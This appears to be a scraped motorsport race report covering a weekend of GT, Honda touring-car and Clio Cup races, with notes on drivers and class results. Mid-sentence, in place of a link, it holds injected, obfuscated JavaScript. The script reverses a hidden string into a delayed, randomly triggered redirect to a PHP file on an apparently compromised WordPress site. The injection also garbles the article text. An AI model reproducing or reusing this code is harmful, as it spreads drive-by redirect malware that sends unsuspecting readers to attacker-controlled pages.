Though that certainly hadn’t been the plan at the beginning of the weekend, as the second 458 Italia in the AUH Motorsport garage ascertained. The team (now running under the Dragon Racing banner) had hoped to put some testing miles on its second Ferrari alongside its established scarlet 2012 workhorse, but mechanical maladies early the weekend put paid to that idea quickly. A ‘win’ apiece for Price and Barff after some hardfought $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-track/blancpain-endurance-round-6-navarra-crowning-achievements/” target=”_blank”>Blancpain Endurance Series outings was some comfort though.
Rupesh Channake picked up where former teammate (and three-time Champion) Umair Khan left off in the Lap 57 Racing Honda by dominating both races in the Civic Type R. Struggling with setup issues, class rival Jonathan Mullan shadowed the Channake to the flag on both occasions in his privately entered Honda Integra, but was unable to mount a serious challenge.
The second Moutran brother (Ramzi this time) led the way in the expanded Clio Cup throughout the weekend, despite commendable efforts from Annivas brothers Alexandros (the reigning class Champion) and Konstantinos to steal his thunder. Though the siblings refused to confirm that a weekend rivalry was brewing between them, Konstantinos was still keen to take a trophy home to Greece in his hand luggage (he didn’t go home disappointed). Leon Johnson and Will Morrison meanwhile made sure Moutran was made to work for his plaudits.
